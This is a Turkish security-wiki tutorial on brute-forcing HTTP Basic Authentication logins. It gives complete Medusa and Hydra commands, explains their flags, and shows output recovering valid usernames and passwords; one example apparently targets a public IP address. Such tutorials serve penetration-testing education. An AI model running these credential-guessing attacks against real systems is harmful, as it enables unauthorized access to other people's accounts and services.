HTTP Basic Authencation Korumalı Sitelere Yönelik Kaba Kuvvet Saldırısı

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç:

Web basic authentication korumalı web uygulamalarında kullanılan user/pass bilgisini kaba kuvvet saldırıları ile elde etme.

Araç:

  • Medusa

Adımlar:

HTTP basic authencation korumalı sayfaların görünümü:

Bruteforce.jpg


1. Adım: Medusa ile basic HTTP authencation koruması olan sayfalara yönelik kaba kuvvet saldırısı:

root@bt:~/Desktop# medusa -h 192.168.5.5 -U users.txt -P pass.txt -M http -F
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [http] Host: 192.168.5.5 (1 of 1, 0 complete) User: admin (1 of 2, 0 complete) Password: 123456 (1 of 17 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.5 (1 of 1, 0 complete) User: admin (1 of 2, 0 complete) Password: 1 (2 of 17 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.5(1 of 1, 0 complete) User: admin (1 of 2, 0 complete) Password: 123 (3 of 17 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.5 (1 of 1, 0 complete) User: admin (1 of 2, 0 complete) Password: 1234 (4 of 17 complete)
ACCOUNT FOUND: [http] Host: 192.168.5.5 User: admin Password: 1234 [SUCCESS]
  • U ile denenecek kullanıcı adları bir listeden verilir.
  • P ile denenecek parolalar bir listeden verilir.
  • M ile saldırının yapılacağı metot seçilir.
  • F ile ilk başarılı girişte saldırının durdurulması seçilir.

2. Adım: Hydra ile basic HTTP authencation koruması olan sayfalara yönelik kaba kuvvet saldırısı:

root@bt:~/Desktop# hydra -L users.txt -P pass.txt http://131.104.163.19
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2012-11-30 11:09:00
[WARNING] The service http has been replaced with http-head and http-get, using by default GET method. Same for https.
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] 16 tasks, 1 server, 34 login tries (l:2/p:17), ~2 tries per task
[DATA] attacking service http-get on port 80
[80][www] host: 131.104.163.19 login: admin password: 1234
[80][www] host: 131.104.163.19 login: test password: 1234
[STATUS] attack finished for 131.104.163.19 (waiting for children to finish)
1 of 1 target successfuly completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-11-30 11:09:05
  • L ile denenecek kullanıcı adları bir listeden verilir.
  • P ile denenecek parolaları bir listeden verilir.